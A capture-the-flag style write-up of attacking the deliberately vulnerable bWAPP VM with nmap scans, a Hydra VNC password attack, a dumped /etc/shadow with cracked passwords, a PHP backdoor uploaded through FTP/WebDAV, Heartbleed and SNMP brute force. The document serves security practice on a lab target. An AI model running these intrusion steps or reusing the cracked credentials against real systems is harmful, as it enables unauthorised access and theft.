BWApp Write-Up

This post contains the steps to get a root shell with bWapp VM

Host discovery

As always, we need to discover where the machine is on our network. To do so, let’s use Nmap:

nmap -sP 192.168.1.1/24 

Fingerprinting

After getting the IP address (192.168.1.10), we need to do some fingerprinting.

nmap -sV 192.168.1.10

Fig. Nmap scan result

A lot of services were open, such as: VNC, FTP, etc.

As I saw it in the scan report, I decided to scan the port 80 with Nikto.

Fig. Nikto report on ports 80 (HTTP)

Moreover, I decided to launch DirBuster to retrieve folders/documents.

Fig. Launching DirBuster on port 80

To conclude, I checked the FTP (ProFTPD 1.3) and I was able to connect as an anonymous user. We only had access to a folder full of PDF documents.

Fig. Anonymous access on FTP Server

Thanks to DirBuster result, I saw that the /webdav/ folder (accessible through HTTP) was linked to the folder we were connected through the FTP session.

Let’s talk now about the exploitation

Exploitation

###Exploiting VNC

I started by exploiting VNC Service using Hydra to crack the password :

hydra -p "password" 192.168.1.10 vnc

Fig. Checking that VNC uses default password

The output was clear: the password was the default one. We were able connect using vncviewer and we were … r00t.

Fig. Root access through VNC

Then, I extracted the /etc/shadow :

root:$1$6.aigTP1$FC1TuoITEYSQwRV0hi6gj/:15792:0:99999:7:::
daemon:*:13991:0:99999:7:::
bin:*:13991:0:99999:7:::
sys:*:13991:0:99999:7:::
sync:*:13991:0:99999:7:::
games:*:13991:0:99999:7:::
man:*:13991:0:99999:7:::
lp:*:13991:0:99999:7:::
mail:*:13991:0:99999:7:::
news:*:13991:0:99999:7:::
uucp:*:13991:0:99999:7:::
proxy:*:13991:0:99999:7:::
www-data:*:13991:0:99999:7:::
backup:*:13991:0:99999:7:::
list:*:13991:0:99999:7:::
irc:*:13991:0:99999:7:::
gnats:*:13991:0:99999:7:::
nobody:*:13991:0:99999:7:::
libuuid:!:13991:0:99999:7:::
dhcp:*:13991:0:99999:7:::
syslog:*:13991:0:99999:7:::
klog:*:13991:0:99999:7:::
hplip:*:13991:0:99999:7:::
avahi-autoipd:*:13991:0:99999:7:::
gdm:*:13991:0:99999:7:::
pulse:*:13991:0:99999:7:::
messagebus:*:13991:0:99999:7:::
avahi:*:13991:0:99999:7:::
polkituser:*:13991:0:99999:7:::
haldaemon:*:13991:0:99999:7:::
bee:$1$tJB0ndAJ$0d42BkRQ7vebj/bE5RdQH1:15792:0:99999:7:::
mysql:!:15792:0:99999:7:::
sshd:*:15792:0:99999:7:::
dovecot:*:15792:0:99999:7:::
smmta:*:15792:0:99999:7:::
smmsp:*:15792:0:99999:7:::
neo:$1$fSorv0ad$56lfF9qd8o4caaSB6dVqi/:15897:0:99999:7:::
alice:$1$yRUOVrYB$9f4TMaym/xOSeGbmsgFGI/:15897:0:99999:7:::
thor:$1$Iy6Mvuaz$FzcNXTQ668kDD5LY.ObdL/:15897:0:99999:7:::
wolverine:$1$PUGlrXi8$oXOwDBaAzxtgXh10Xkw9i/:15897:0:99999:7:::
johnny:$1$uqzKnduQ$MPxhWXcf2FFQarhO95d5y/:15897:0:99999:7:::
selene:$1$BHZLob3h$mru35IhZzRdnfTHOADrkJ0:15897:0:99999:7:::
postfix:*:15901:0:99999:7:::
proftpd:!:16051:0:99999:7:::
ftp:*:16051:0:99999:7:::
snmp:*:16178:0:99999:7:::
ntp:*:16178:0:99999:7:::

I decided to crack it using John the Ripper and I cracked 4 hashes (using d4rkc0de.lst):

Asgard           (thor)
bug              (bee)
bug              (root)
m00n             (selene)
trinity          (neo)

We could log in in root and had entire access on the server.

###Exploiting Webdav

As we saw: we have FTP access in a folder accessible through HTTP. Then, we can upload a (PHP) Backdoor.

Fig. Checking that Webdav was activated

Fig. Uploading our backdoor on the Server

Then, the backdoor is accessible in the folder /webdav

Let’s access it and we’ll have access on the server (but limited shell) so this was not really interested compared to the other vulns.

Fig. Executing commands with our Backdoor

###Exploiting Heartbleed

Everybody heard about Heartbleed and bWAPP integrates a vulnerable version of OpenSSL. You can then practice it and try all the scripts that have been released on the internet.

Fig. Configuring Heartbleed on port 8443

Fig. Exploiting Heartbleed attack

For this experiment, I wanted to have fun with the Metasploit’s one but try the one you prefer. Moreover, you can give it a try to steal private keys :-).

###Exploiting SNMP

The last step was to exploit SNMP service. First, I bruteforce the login and we found two (default) logins :

Fig. Bruteforcing SNMP Logins

Then, we exploited the service to gather lot of information such as the Computer Name, the processes running on the system etc. And this is basically due to a (default and not secure) installation of SNMP Service.

Fig. Exploiting SNMP Service

###Thoughts

I just checked for few hours the VM and it contains a lot of (interesting) exercices to practice with. I exploited some of the flaws but there are even more so this write-up is not exhaustive.

Feel free to exploit this VM the way you prefer :-) Cheers,